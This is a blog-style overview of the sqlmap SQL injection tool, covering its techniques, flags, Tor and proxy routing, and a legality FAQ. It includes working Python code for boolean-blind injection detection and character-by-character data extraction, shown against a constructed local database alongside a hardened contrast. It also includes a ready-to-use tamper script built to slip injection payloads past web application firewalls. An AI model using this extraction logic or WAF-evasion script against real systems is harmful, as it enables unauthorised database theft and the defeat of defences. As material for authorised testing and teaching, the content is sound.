Configs · May 4, 2026 · 3 min read

sqlmap — Automatic SQL Injection and Database Takeover Tool

An open-source penetration testing tool that automates detection and exploitation of SQL injection flaws in web applications.

Introduction

sqlmap is an open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection vulnerabilities. It is widely used by security professionals, bug bounty hunters, and CTF competitors for authorized testing engagements.

What sqlmap Does

  • Detects SQL injection using boolean-based blind, time-based blind, error-based, UNION query-based, stacked-query, and inline-query techniques
  • Supports MySQL, PostgreSQL, Oracle, Microsoft SQL Server, SQLite, and 10+ other DBMS
  • Enumerates databases, tables, columns, and dumps data from vulnerable endpoints
  • Escalates to OS command execution where the DBMS and the database account's privileges allow it, e.g. via xp_cmdshell on Microsoft SQL Server or injected user-defined functions on MySQL and PostgreSQL
  • Supports HTTP authentication, proxies, cookies, and custom headers
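The boolean-based blind technique from the list above, reduced to a runnable model. This is an added example, not code from sqlmap: the target is a constructed in-memory SQLite database, and `VulnerableApp` / `HardenedApp` are hypothetical endpoints standing in for the HTTP layer (their "found" / "not found" strings play the role of the page body). The detection check (does an always-true condition reproduce the baseline response while an always-false one changes it?) and the per-character bisection used to pull data through a yes/no oracle are the same logic sqlmap automates.

```python
import sqlite3


def build_db():
    """Constructed in-memory database standing in for the target's backend (assumption of this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cr3t"), (2, "bob", "hunter2")])
    conn.commit()
    return conn


class VulnerableApp:
    """Hypothetical endpoint that concatenates the 'id' parameter into SQL: the flaw sqlmap hunts for."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0  # counts simulated HTTP requests, to show the cost of blind extraction

    def lookup(self, user_id):
        self.requests += 1
        query = "SELECT username FROM users WHERE id = " + user_id  # deliberately injectable
        try:
            row = self.conn.execute(query).fetchone()
        except sqlite3.Error:
            return "error"
        return "found" if row else "not found"


class HardenedApp(VulnerableApp):
    """Same endpoint with a parameterised query; injected text is bound as a literal value."""

    def lookup(self, user_id):
        self.requests += 1
        row = self.conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
        return "found" if row else "not found"


def detect_boolean_blind(app, param_value="1"):
    """sqlmap's boolean-based check in miniature: an always-true condition must reproduce the
    baseline response and an always-false condition must change it."""
    baseline = app.lookup(param_value)
    true_page = app.lookup(f"{param_value} AND 1=1")
    false_page = app.lookup(f"{param_value} AND 1=2")
    return true_page == baseline and false_page != baseline


def oracle(app, condition):
    """One blind request: True when the injected condition holds (the page matches the baseline)."""
    return app.lookup(f"1 AND ({condition})") == "found"


def extract_string(app, subquery, max_len=32):
    """Recover the result of `subquery` one character at a time, bisecting each code point so a
    character costs 7 requests instead of up to 127 (the same idea as sqlmap's bisection)."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Past the end of the string substr() is '' and unicode('') is NULL, so the comparison
            # is never true and the search bottoms out at 0, which terminates the loop below.
            if oracle(app, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    app = VulnerableApp(build_db())
    print("injectable:", detect_boolean_blind(app))
    secret = extract_string(app, "SELECT password FROM users WHERE username = 'admin'")
    print(f"admin password {secret!r} recovered in {app.requests} simulated requests")
    print("hardened endpoint injectable:", detect_boolean_blind(HardenedApp(build_db())))
```

Against the hardened variant the "1 AND 1=1" probe is bound as the literal text `'1 AND 1=1'`, no row matches, and the detection check fails; that is the whole difference sqlmap's boolean test is measuring. Real targets add noise (dynamic page content, rate limits, WAFs), which is why sqlmap first checks response stability before trusting a true/false split.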

Architecture Overview

sqlmap is a single Python application that takes a target URL or a captured request file and runs a battery of injection tests. It first checks that responses are stable, uses heuristic probes to identify injectable parameters, then works through increasingly aggressive payloads, with --level and --risk bounding how far it goes. A tamper script system lets users transform or encode each payload before delivery to get past web application firewalls.

Self-Hosting & Configuration

  • Install via pip or clone the repository directly
  • Provide targets via URL, request file, or Burp Suite log import
  • Configure tamper scripts to evade web application firewalls
  • Use --level (1 to 5) to widen the set of parameters and payloads tested (cookies from level 2, User-Agent and Referer headers from level 3) and --risk (1 to 3) to enable payloads that may modify data, such as OR-based tests that are dangerous inside UPDATE statements
  • Route traffic through an HTTP or SOCKS proxy (--proxy), a rotating proxy list (--proxy-file), or Tor (--tor, with --check-tor to verify the circuit)

Key Features

  • Automatic fingerprinting of the backend DBMS from injection responses
  • Built-in tamper script library with 50+ WAF bypass techniques
  • File read/write on the server filesystem through SQL injection (--file-read, --file-write), subject to the database account holding the required privileges, such as FILE on MySQL
  • Interactive OS shell when the database allows command execution
  • Crawling and form-based parameter discovery with --forms and --crawl

Comparison with Similar Tools

  • Havij — Windows-only GUI tool, no longer maintained
  • jSQL Injection — Java-based alternative with GUI, fewer DBMS supported
  • NoSQLMap — focuses on NoSQL databases like MongoDB instead of SQL
  • Ghauri — newer Python tool inspired by sqlmap with improved detection for specific edge cases

FAQ

Q: Is sqlmap legal to use? A: sqlmap is legal to possess and use only against systems you own or have explicit written authorization to test. Unauthorized use is illegal.

Q: Can sqlmap bypass web application firewalls? A: sqlmap includes tamper scripts that modify payloads to evade common signature-based WAF rules, and several can be chained with a comma-separated --tamper list. Custom tamper scripts can be written for specific WAFs. No script guarantees a bypass; each one trades off against a particular rule set.
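A custom tamper script of the kind this answer (and the tamper mentions under Architecture Overview and Key Features) refers to. This is an added example, not a script from the sqlmap repository: it combines two transformations that sqlmap ships separately, replacing spaces with inline comments and randomising keyword case, while leaving quoted string literals untouched so the payload's meaning does not change. The file name and the keyword list are assumptions; the entry point signature (`tamper(payload, **kwargs)` returning the new payload) and the `__priority__` / `dependencies()` conventions are what sqmlap's loader expects.

```python
"""Hypothetical sqlmap tamper script (added example, not part of sqlmap).
Save as tamper/space2comment_randcase.py in the sqlmap tree and pass --tamper=space2comment_randcase.
"""
import random
import re

try:
    from lib.core.enums import PRIORITY      # available when sqlmap loads the script
    __priority__ = PRIORITY.NORMAL           # decides the order when several scripts are chained
except ImportError:                           # stand-alone run outside the sqlmap tree
    __priority__ = 0

# Keywords whose case gets randomised (assumption: the target WAF matches them case-sensitively).
KEYWORDS = ("SELECT", "UNION", "AND", "OR", "FROM", "WHERE", "ORDER", "BY", "NULL", "SLEEP", "BENCHMARK")

_KEYWORD = re.compile(r"\b(?:" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)
_QUOTED = re.compile(r"'[^']*'|\"[^\"]*\"")   # single- or double-quoted literals, kept verbatim


def dependencies():
    """sqmlap calls this so a script can warn about backends it does not support; none here."""
    pass


def _transform_unquoted(payload, func):
    """Apply func to every stretch of payload that lies outside quoted string literals."""
    out, last = [], 0
    for m in _QUOTED.finditer(payload):
        out.append(func(payload[last:m.start()]))
        out.append(m.group(0))               # literal copied byte-for-byte
        last = m.end()
    out.append(func(payload[last:]))
    return "".join(out)


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload; must return the transformed payload.

    'UNION SELECT NULL,NULL' becomes e.g. 'uNiOn/**/SeLeCt/**/nUlL,NULL': the SQL still parses,
    but a rule expecting the literal text 'UNION SELECT' no longer matches.
    """
    if not payload:
        return payload
    rng = random.Random(payload)  # seeded from the payload so the same input always tampers the same way

    def transform(chunk):
        chunk = _KEYWORD.sub(
            lambda m: "".join(rng.choice((c.lower(), c.upper())) for c in m.group(0)), chunk)
        return chunk.replace(" ", "/**/")   # MySQL/MSSQL/PostgreSQL accept /**/ as whitespace

    return _transform_unquoted(payload, transform)


if __name__ == "__main__":
    for sample in ("1 AND 'a b'='a b'", "UNION SELECT NULL,NULL", "1 OR 'OR'"):
        print(f"{sample!r} -> {tamper(sample)!r}")
```

Seeding the generator from the payload keeps runs reproducible, which matters when you are comparing WAF behaviour across repeated requests; sqlmap's own randomcase script does not do this. Scripts are applied in priority order, so a script that changes spacing should normally run after one that changes keywords, which is why the two steps live in a single `transform` here.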

Q: Does sqlmap work with POST requests? A: Yes. Use --data to specify POST parameters, or provide a full HTTP request file captured from a proxy like Burp Suite.

Q: How does sqlmap handle HTTPS? A: sqlmap supports HTTPS natively when the target URL uses the https:// scheme. Use --force-ssl to force HTTPS when the scheme is missing or detection picks the wrong one.
